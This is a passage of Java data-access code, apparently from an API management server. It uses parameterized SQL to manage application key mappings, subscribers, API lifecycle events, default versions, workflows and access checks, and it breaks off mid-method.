Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_APPLICATION_ID_BY_CONSUMER_KEY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, consumerKey); rs = prepStmt.executeQuery(); while (rs.next()) { appIdAndConsumerKey.put("application_id", rs.getString("APPLICATION_ID")); appIdAndConsumerKey.put("token_type", rs.getString("KEY_TYPE")); } } catch (SQLException e) { handleException("Error when reading application subscription information", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return appIdAndConsumerKey; } /* Delete mapping record by given consumer key */ public void deleteApplicationKeyMappingByConsumerKey(String consumerKey) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteKeyMappingQuery = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_CONSUMER_KEY_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete key mapping for consumer id " + consumerKey); } ps = connection.prepareStatement(deleteKeyMappingQuery); ps.setString(1, consumerKey); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing application mapping table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * This method will delete a record from AM_APPLICATION_REGISTRATION * * @param applicationId * @param tokenType */ public void deleteApplicationKeyMappingByApplicationIdAndType(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.DELETE_APPLICATION_KEY_MAPPING_BY_APPLICATION_ID_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_KEY_MAPPING table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_KEY_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Delete a record from AM_APPLICATION_REGISTRATION table by application ID and token type. * * @param applicationId APIM application ID. * @param tokenType Token type (PRODUCTION || SANDBOX) * @throws APIManagementException if failed to delete the record. */ public void deleteApplicationRegistration(String applicationId, String tokenType) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); String deleteRegistrationEntry = SQLConstants.REMOVE_FROM_APPLICATION_REGISTRANTS_SQL; if (log.isDebugEnabled()) { log.debug("trying to delete a record from AM_APPLICATION_REGISTRATION table by application ID " + applicationId + " and Token type" + tokenType); } ps = connection.prepareStatement(deleteRegistrationEntry); ps.setInt(1, Integer.parseInt(applicationId)); ps.setString(2, tokenType); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while removing AM_APPLICATION_REGISTRATION table", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * returns a subscriber record for given username,tenant Id * * @param username UserName * @param tenantId Tenant Id * @param connection * @return Subscriber * @throws APIManagementException if failed to get subscriber */ private Subscriber getSubscriber(String username, int tenantId, Connection connection) throws APIManagementException { PreparedStatement prepStmt = null; ResultSet rs = null; Subscriber subscriber = null; String sqlQuery; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIBER_CASE_INSENSITIVE_SQL; } else { sqlQuery = SQLConstants.GET_SUBSCRIBER_DETAILS_SQL; } try { prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, username); prepStmt.setInt(2, tenantId); rs = prepStmt.executeQuery(); if (rs.next()) { subscriber = new Subscriber(rs.getString("USER_ID")); subscriber.setEmail(rs.getString("EMAIL_ADDRESS")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); subscriber.setSubscribedDate(rs.getDate("DATE_SUBSCRIBED")); subscriber.setTenantId(rs.getInt("TENANT_ID")); return subscriber; } } catch (SQLException e) { handleException("Error when reading the application information from" + " the persistence store.", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, rs); } return subscriber; } public void recordAPILifeCycleEvent(APIIdentifier identifier, APIStatus oldStatus, APIStatus newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus.toString(), newStatus.toString(), userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); recordAPILifeCycleEvent(identifier, oldStatus, newStatus, userId, tenantId, conn); } catch (SQLException e) { handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public void recordAPILifeCycleEvent(APIIdentifier identifier, String oldStatus, String newStatus, String userId, int tenantId, Connection conn) throws APIManagementException { //Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; PreparedStatement selectQuerySt = null; int apiId = -1; if (oldStatus == null && !newStatus.equals(APIConstants.CREATED)) { String msg = "Invalid old and new state combination"; log.error(msg); throw new APIManagementException(msg); } else if (oldStatus != null && oldStatus.equals(newStatus)) { String msg = "No measurable differences in API state"; log.error(msg); throw new APIManagementException(msg); } String getAPIQuery = SQLConstants.GET_API_ID_SQL; String sqlQuery = SQLConstants.ADD_API_LIFECYCLE_EVENT_SQL; try { conn.setAutoCommit(false); selectQuerySt = conn.prepareStatement(getAPIQuery); selectQuerySt.setString(1, APIUtil.replaceEmailDomainBack(identifier.getProviderName())); selectQuerySt.setString(2, identifier.getApiName()); selectQuerySt.setString(3, identifier.getVersion()); resultSet = selectQuerySt.executeQuery(); if (resultSet.next()) { apiId = resultSet.getInt("API_ID"); } if (apiId == -1) { String msg = "Unable to find the API: " + identifier + " in the database"; log.error(msg); throw new APIManagementException(msg); } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); if (oldStatus != null) { ps.setString(2, oldStatus); } else { ps.setNull(2, Types.VARCHAR); } ps.setString(3, newStatus); ps.setString(4, userId); ps.setInt(5, tenantId); ps.setTimestamp(6, new Timestamp(System.currentTimeMillis())); ps.executeUpdate(); // finally commit transaction conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback the API state change record", e1); } } handleException("Failed to record API state change", e); } finally { APIMgtDBUtil.closeAllConnections(selectQuerySt, null, null); APIMgtDBUtil.closeAllConnections(ps, null, resultSet); } } public void updateDefaultAPIPublishedVersion(APIIdentifier identifier, String oldStatus, String newStatus) throws APIManagementException { Connection conn = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(false); if (!oldStatus.equals(newStatus)) { if ((APIConstants.CREATED.equals(newStatus) || APIConstants.RETIRED.equals(newStatus)) && ( APIConstants.PUBLISHED.equals(oldStatus) || APIConstants.DEPRECATED.equals(oldStatus) || APIConstants.BLOCKED.equals(oldStatus))) { setPublishedDefVersion(identifier, conn, null); } else if (APIConstants.PUBLISHED.equals(newStatus) || APIConstants.DEPRECATED.equals(newStatus) || APIConstants.BLOCKED.equals(newStatus)) { setPublishedDefVersion(identifier, conn, identifier.getVersion()); } } conn.commit(); } catch (SQLException e) { handleException("Failed to update published default API state change", e); } finally { APIMgtDBUtil.closeAllConnections(null, conn, null); } } public List<LifeCycleEvent> getLifeCycleEvents(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String sqlQuery = SQLConstants.GET_LIFECYCLE_EVENT_SQL; List<LifeCycleEvent> events = new ArrayList<LifeCycleEvent>(); try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(sqlQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmt.setString(2, apiId.getApiName()); prepStmt.setString(3, apiId.getVersion()); rs = prepStmt.executeQuery(); while (rs.next()) { LifeCycleEvent event = new LifeCycleEvent(); event.setApi(apiId); String oldState = rs.getString("PREVIOUS_STATE"); //event.setOldStatus(oldState != null ? APIStatus.valueOf(oldState) : null); event.setOldStatus(oldState != null ? oldState : null); //event.setNewStatus(APIStatus.valueOf(rs.getString("NEW_STATE"))); event.setNewStatus(rs.getString("NEW_STATE")); event.setUserId(rs.getString("USER_ID")); event.setDate(rs.getTimestamp("EVENT_DATE")); events.add(event); } Collections.sort(events, new Comparator<LifeCycleEvent>() { public int compare(LifeCycleEvent o1, LifeCycleEvent o2) { return o1.getDate().compareTo(o2.getDate()); } }); } catch (SQLException e) { handleException("Error when executing the SQL : " + sqlQuery, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return events; } public void makeKeysForwardCompatible(String provider, String apiName, String oldVersion, String newVersion, String context) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; PreparedStatement addSubKeySt = null; PreparedStatement getAppSt = null; ResultSet rs = null; String getSubscriptionDataQuery = SQLConstants.GET_SUBSCRIPTION_DATA_SQL; String addSubKeyMapping = SQLConstants.ADD_SUBSCRIPTION_KEY_MAPPING_SQL; String getApplicationDataQuery = SQLConstants.GET_APPLICATION_DATA_SQL; try { // Retrieve all the existing subscription for the old version connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(getSubscriptionDataQuery); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(provider)); prepStmt.setString(2, apiName); prepStmt.setString(3, oldVersion); rs = prepStmt.executeQuery(); List<SubscriptionInfo> subscriptionData = new ArrayList<SubscriptionInfo>(); Set<Integer> subscribedApplications = new HashSet<Integer>(); while (rs.next() && !(APIConstants.SubscriptionStatus.ON_HOLD.equals(rs.getString("SUB_STATUS")))) { SubscriptionInfo info = new SubscriptionInfo(); info.subscriptionId = rs.getInt("SUBSCRIPTION_ID"); info.tierId = rs.getString("TIER_ID"); info.applicationId = rs.getInt("APPLICATION_ID"); info.accessToken = rs.getString("ACCESS_TOKEN"); // no decryption needed. info.tokenType = rs.getString("KEY_TYPE"); subscriptionData.add(info); } Map<Integer, Integer> subscriptionIdMap = new HashMap<Integer, Integer>(); APIIdentifier apiId = new APIIdentifier(provider, apiName, newVersion); for (SubscriptionInfo info : subscriptionData) { try { if (!subscriptionIdMap.containsKey(info.subscriptionId)) { apiId.setTier(info.tierId); int subscriptionId = addSubscription(apiId, context, info.applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); if (subscriptionId == -1) { String msg = "Unable to add a new subscription for the API: " + apiName + ":v" + newVersion; log.error(msg); throw new APIManagementException(msg); } subscriptionIdMap.put(info.subscriptionId, subscriptionId); } int subscriptionId = subscriptionIdMap.get(info.subscriptionId); connection.setAutoCommit(false); addSubKeySt = connection.prepareStatement(addSubKeyMapping); addSubKeySt.setInt(1, subscriptionId); addSubKeySt.setString(2, info.accessToken); addSubKeySt.setString(3, info.tokenType); addSubKeySt.execute(); connection.commit(); subscribedApplications.add(info.applicationId); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { log.error("Error while adding subscription " + e.getMessage(), e); } } getAppSt = connection.prepareStatement(getApplicationDataQuery); getAppSt.setString(1, APIUtil.replaceEmailDomainBack(provider)); getAppSt.setString(2, apiName); getAppSt.setString(3, oldVersion); rs = getAppSt.executeQuery(); while (rs.next()) { int applicationId = rs.getInt("APPLICATION_ID"); if (!subscribedApplications.contains(applicationId)) { apiId.setTier(rs.getString("TIER_ID")); try { addSubscription(apiId, rs.getString("CONTEXT"), applicationId, APIConstants .SubscriptionStatus.UNBLOCKED, provider); // catching the exception because when copy the api without the option "require re-subscription" // need to go forward rather throwing the exception } catch (SubscriptionAlreadyExistingException e) { //Not handled as an error because same subscription can be there in many previous versions. //Ex: if previous version was created by another older version and if the subscriptions are //Forwarded, then the third one will get same subscription from previous two versions. log.info("Subscription already exists: " + e.getMessage()); } } } } catch (SQLException e) { handleException("Error when executing the SQL queries", e); } finally { APIMgtDBUtil.closeAllConnections(getAppSt, null, null); APIMgtDBUtil.closeAllConnections(addSubKeySt, null, null); APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public void addAPI(API api, int tenantId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String query = SQLConstants.ADD_API_SQL; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query, new String[]{"api_id"}); prepStmt.setString(1, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setString(2, api.getId().getApiName()); prepStmt.setString(3, api.getId().getVersion()); prepStmt.setString(4, api.getContext()); String contextTemplate = api.getContextTemplate(); //Validate if the API has an unsupported context before executing the query String invalidContext = "/" + APIConstants.VERSION_PLACEHOLDER; if (invalidContext.equals(contextTemplate)) { throw new APIManagementException("Cannot add API : " + api.getId() + " with unsupported context : " + contextTemplate); } //If the context template ends with {version} this means that the version will be at the end of the context. if (contextTemplate.endsWith("/" + APIConstants.VERSION_PLACEHOLDER)) { //Remove the {version} part from the context template. contextTemplate = contextTemplate.split(Pattern.quote("/" + APIConstants.VERSION_PLACEHOLDER))[0]; } prepStmt.setString(5, contextTemplate); prepStmt.setString(6, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmt.setTimestamp(7, new Timestamp(System.currentTimeMillis())); prepStmt.setString(8, api.getApiLevelPolicy()); prepStmt.execute(); rs = prepStmt.getGeneratedKeys(); int apiId = -1; if (rs.next()) { apiId = rs.getInt(1); } connection.commit(); if (api.getScopes() != null) { synchronized (scopeMutex) { addScopes(api.getScopes(), api.getId(), apiId, tenantId); } } addURLTemplates(apiId, api, connection); String tenantUserName = MultitenantUtils .getTenantAwareUsername(APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); recordAPILifeCycleEvent(api.getId(), null, APIStatus.CREATED.toString(), tenantUserName, tenantId, connection); //If the api is selected as default version, it is added/replaced into AM_API_DEFAULT_VERSION table if (api.isDefaultVersion()) { addUpdateAPIAsDefaultVersion(api, connection); } connection.commit(); } catch (SQLException e) { handleException("Error while adding the API: " + api.getId() + " to the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } } public String getDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String oldDefaultVersion = null; String query = SQLConstants.GET_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); if (rs.next()) { oldDefaultVersion = rs.getString("DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return oldDefaultVersion; } /** * Persists WorkflowDTO to Database * * @param workflow * @throws APIManagementException */ public void addWorkflowEntry(WorkflowDTO workflow) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.ADD_WORKFLOW_ENTRY_SQL; try { Timestamp cratedDateStamp = new Timestamp(workflow.getCreatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflow.getWorkflowReference()); prepStmt.setString(2, workflow.getWorkflowType()); prepStmt.setString(3, workflow.getStatus().toString()); prepStmt.setTimestamp(4, cratedDateStamp); prepStmt.setString(5, workflow.getWorkflowDescription()); prepStmt.setInt(6, workflow.getTenantId()); prepStmt.setString(7, workflow.getTenantDomain()); prepStmt.setString(8, workflow.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while adding Workflow : " + workflow.getExternalWorkflowReference() + " to the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } public void updateWorkflowStatus(WorkflowDTO workflowDTO) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.UPDATE_WORKFLOW_ENTRY_SQL; try { Timestamp updatedTimeStamp = new Timestamp(workflowDTO.getUpdatedTime()); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowDTO.getStatus().toString()); prepStmt.setString(2, workflowDTO.getWorkflowDescription()); prepStmt.setString(3, workflowDTO.getExternalWorkflowReference()); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException("Error while updating Workflow Status of workflow " + workflowDTO .getExternalWorkflowReference(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Returns a workflow object for a given external workflow reference. * * @param workflowReference * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflow(String workflowReference) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } /** * Returns a workflow object for a given internal workflow reference and the workflow type. * * @param workflowReference * @param workflowType * @return * @throws APIManagementException */ public WorkflowDTO retrieveWorkflowFromInternalReference(String workflowReference, String workflowType) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; WorkflowDTO workflowDTO = null; String query = SQLConstants.GET_ALL_WORKFLOW_ENTRY_FROM_INTERNAL_REF_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, workflowReference); prepStmt.setString(2, workflowType); rs = prepStmt.executeQuery(); while (rs.next()) { workflowDTO = WorkflowExecutorFactory.getInstance().createWorkflowDTO(rs.getString("WF_TYPE")); workflowDTO.setStatus(WorkflowStatus.valueOf(rs.getString("WF_STATUS"))); workflowDTO.setExternalWorkflowReference(rs.getString("WF_EXTERNAL_REFERENCE")); workflowDTO.setCreatedTime(rs.getTimestamp("WF_CREATED_TIME").getTime()); workflowDTO.setWorkflowReference(rs.getString("WF_REFERENCE")); workflowDTO.setTenantDomain(rs.getString("TENANT_DOMAIN")); workflowDTO.setTenantId(rs.getInt("TENANT_ID")); workflowDTO.setWorkflowDescription(rs.getString("WF_STATUS_DESC")); } } catch (SQLException e) { handleException("Error while retrieving workflow details for " + workflowReference, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return workflowDTO; } private void setPublishedDefVersion(APIIdentifier apiId, Connection connection, String value) throws APIManagementException { String queryDefaultVersionUpdate = SQLConstants.UPDATE_PUBLISHED_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionUpdate = null; try { prepStmtDefVersionUpdate = connection.prepareStatement(queryDefaultVersionUpdate); prepStmtDefVersionUpdate.setString(1, value); prepStmtDefVersionUpdate.setString(2, apiId.getApiName()); prepStmtDefVersionUpdate.setString(3, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionUpdate.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionUpdate, null, null); } } /** * Sets/removes default api entry such that api will not represent as default api further. * If the api's version is the same as the published version, then the whole entry will be removed. * Otherwise only the default version attribute is set to null. * * @param apiId * @param connection * @return * @throws APIManagementException */ public void removeAPIFromDefaultVersion(APIIdentifier apiId, Connection connection) throws APIManagementException { String queryDefaultVersionDelete = SQLConstants.REMOVE_API_DEFAULT_VERSION_SQL; PreparedStatement prepStmtDefVersionDelete = null; try { prepStmtDefVersionDelete = connection.prepareStatement(queryDefaultVersionDelete); prepStmtDefVersionDelete.setString(1, apiId.getApiName()); prepStmtDefVersionDelete.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); prepStmtDefVersionDelete.execute(); } catch (SQLException e) { handleException("Error while deleting the API default version entry: " + apiId.getApiName() + " from the " + "database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionDelete, null, null); } } public String getPublishedDefaultVersion(APIIdentifier apiId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; String publishedDefaultVersion = null; String query = SQLConstants.GET_PUBLISHED_DEFAULT_VERSION_SQL; try { connection = APIMgtDBUtil.getConnection(); prepStmt = connection.prepareStatement(query); prepStmt.setString(1, apiId.getApiName()); prepStmt.setString(2, APIUtil.replaceEmailDomainBack(apiId.getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { publishedDefaultVersion = rs.getString("PUBLISHED_DEFAULT_API_VERSION"); } } catch (SQLException e) { handleException("Error while getting default version for " + apiId.getApiName(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return publishedDefaultVersion; } public void addUpdateAPIAsDefaultVersion(API api, Connection connection) throws APIManagementException { String publishedDefaultVersion = getPublishedDefaultVersion(api.getId()); removeAPIFromDefaultVersion(api.getId(), connection); PreparedStatement prepStmtDefVersionAdd = null; String queryDefaultVersionAdd = SQLConstants.ADD_API_DEFAULT_VERSION_SQL; try { prepStmtDefVersionAdd = connection.prepareStatement(queryDefaultVersionAdd); prepStmtDefVersionAdd.setString(1, api.getId().getApiName()); prepStmtDefVersionAdd.setString(2, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); prepStmtDefVersionAdd.setString(3, api.getId().getVersion()); String apistatus = api.getStatus(); if (APIConstants.PUBLISHED.equals(apistatus) || APIConstants.DEPRECATED.equals(apistatus) || APIConstants .BLOCKED.equals(apistatus)) { prepStmtDefVersionAdd.setString(4, api.getId().getVersion()); } else { prepStmtDefVersionAdd.setString(4, publishedDefaultVersion); } prepStmtDefVersionAdd.execute(); } catch (SQLException e) { handleException("Error while adding the API default version entry: " + api.getId().getApiName() + " to " + "the database", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtDefVersionAdd, null, null); } } /** * Adds URI templates define for an API * * @param apiId * @param api * @param connection * @throws APIManagementException */ public void addURLTemplates(int apiId, API api, Connection connection) throws APIManagementException { if (apiId == -1) { //application addition has failed return; } PreparedStatement prepStmt = null; PreparedStatement scopePrepStmt = null; String query = SQLConstants.ADD_URL_MAPPING_SQL; String scopeQuery = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; try { prepStmt = connection.prepareStatement(query); scopePrepStmt = connection.prepareStatement(scopeQuery); Iterator<URITemplate> uriTemplateIterator = api.getUriTemplates().iterator(); URITemplate uriTemplate; for (; uriTemplateIterator.hasNext(); ) { uriTemplate = uriTemplateIterator.next(); prepStmt.setInt(1, apiId); prepStmt.setString(2, uriTemplate.getHTTPVerb()); prepStmt.setString(3, uriTemplate.getAuthType()); prepStmt.setString(4, uriTemplate.getUriTemplate()); //If API policy is available then set it for all the resources. if (StringUtils.isEmpty(api.getApiLevelPolicy())) { prepStmt.setString(5, (StringUtils.isEmpty(uriTemplate.getThrottlingTier())) ? APIConstants.UNLIMITED_TIER : uriTemplate.getThrottlingTier()); } else { prepStmt.setString(5, (StringUtils.isEmpty(api.getApiLevelPolicy())) ? APIConstants.UNLIMITED_TIER : api.getApiLevelPolicy()); } InputStream is; if (uriTemplate.getMediationScript() != null) { is = new ByteArrayInputStream(uriTemplate.getMediationScript().getBytes(Charset.defaultCharset())); } else { is = null; } if (connection.getMetaData().getDriverName().contains("PostgreSQL") || connection.getMetaData() .getDatabaseProductName().contains("DB2")) { if (uriTemplate.getMediationScript() != null) { prepStmt.setBinaryStream(6, is, uriTemplate.getMediationScript().getBytes(Charset.defaultCharset()).length); } else { prepStmt.setBinaryStream(6, is, 0); } } else { prepStmt.setBinaryStream(6, is); } prepStmt.addBatch(); if (uriTemplate.getScope() != null) { scopePrepStmt.setString(1, APIUtil.getResourceKey(api, uriTemplate)); if (uriTemplate.getScope().getId() == 0) { String scopeKey = uriTemplate.getScope().getKey(); Scope scopeByKey = APIUtil.findScopeByKey(api.getScopes(), scopeKey); if (scopeByKey != null) { if (scopeByKey.getId() > 0) { uriTemplate.getScopes().setId(scopeByKey.getId()); } } } scopePrepStmt.setInt(2, uriTemplate.getScope().getId()); scopePrepStmt.setInt(3, APIUtil.getTenantId(APIUtil.replaceEmailDomainBack(api.getId() .getProviderName()))); scopePrepStmt.addBatch(); } } prepStmt.executeBatch(); prepStmt.clearBatch(); scopePrepStmt.executeBatch(); scopePrepStmt.clearBatch(); } catch (SQLException e) { handleException("Error while adding URL template(s) to the database for API : " + api.getId(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, null, null); APIMgtDBUtil.closeAllConnections(scopePrepStmt, null, null); } } /** * Fetches an Application with OAuth Apps, by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationWithOAuthApps(String applicationName, String userId, String groupId) throws APIManagementException { Application application = getApplicationByName(applicationName, userId, groupId); if (application != null) { Map<String, OAuthApplicationInfo> keyMap = getOAuthApplications(application.getId()); for (Map.Entry<String, OAuthApplicationInfo> entry : keyMap.entrySet()) { application.addOAuthApp(entry.getKey(), entry.getValue()); } } return application; } /** * Checks whether application is accessible to the specified user * * @param applicationID ID of the Application * @param userId Name of the User. * @param groupId Group IDs * @throws APIManagementException */ public boolean isAppAllowed(int applicationID, String userId, String groupId) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); String query = "SELECT APP.APPLICATION_ID FROM AM_SUBSCRIBER SUB, AM_APPLICATION APP"; String whereClause = " WHERE SUB.USER_ID =? AND APP.APPLICATION_ID=? AND " + "SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseCaseInSensitive = " WHERE LOWER(SUB.USER_ID) =LOWER(?) AND APP.APPLICATION_ID=? AND SUB" + ".SUBSCRIBER_ID=APP.SUBSCRIBER_ID"; String whereClauseWithGroupId = " WHERE (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?)) AND " + "APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; String whereClauseWithMultiGroupId = " WHERE ((APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR SUB.USER_ID = ? " + "OR (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM AM_APPLICATION WHERE GROUP_ID = ?))) " + "AND APP.APPLICATION_ID = ? AND SUB.SUBSCRIBER_ID = APP.SUBSCRIBER_ID"; if (!StringUtils.isEmpty(groupId) && !APIConstants.NULL_GROUPID_LIST.equals(groupId)) { if (multiGroupAppSharingEnabled) { Subscriber subscriber = getSubscriber(userId); String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); query += whereClauseWithMultiGroupId; String[] groupIds = groupId.split(","); int parameterIndex = groupIds.length; prepStmt = fillQueryParams(connection, query, groupIds, 1); prepStmt.setString(++parameterIndex, tenantDomain); prepStmt.setString(++parameterIndex, userId); prepStmt.setString(++parameterIndex, tenantDomain + '/' + groupId); prepStmt.setInt(++parameterIndex, applicationID); } else { query += whereClauseWithGroupId; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, groupId); prepStmt.setString(2, userId); prepStmt.setInt(3, applicationID); } } else { if (forceCaseInsensitiveComparisons) { query += whereClauseCaseInSensitive; } else { query += whereClause; } prepStmt = connection.prepareStatement(query); prepStmt.setString(1, userId); prepStmt.setInt(2, applicationID); } rs = prepStmt.executeQuery(); while (rs.next()) { return true; } } catch (SQLException e) { handleException("Error while checking whether the application : " + applicationID + " is accessible " + "to user " + userId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return false; } /** * Fetches an Application by name. * * @param applicationName Name of the Application * @param userId Name of the User. * @param groupId Group ID * @throws APIManagementException */ public Application getApplicationByName(String applicationName, String userId, String groupId) throws APIManagementException { //mysql> select APP.APPLICATION_ID, APP.NAME, APP.SUBSCRIBER_ID,APP.APPLICATION_TIER,APP.CALLBACK_URL,APP // .DESCRIPTION, // APP.APPLICATION_STATUS from AM_SUBSCRIBER as SUB,AM_APPLICATION as APP // where SUB.user_id='admin' AND APP.name='DefaultApplication' AND SUB.SUBSCRIBER_ID=APP.SUBSCRIBER_ID; Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_NAME_PREFIX; String whereClause = " WHERE SUB.USER_ID =? AND APP.NAME=? AND 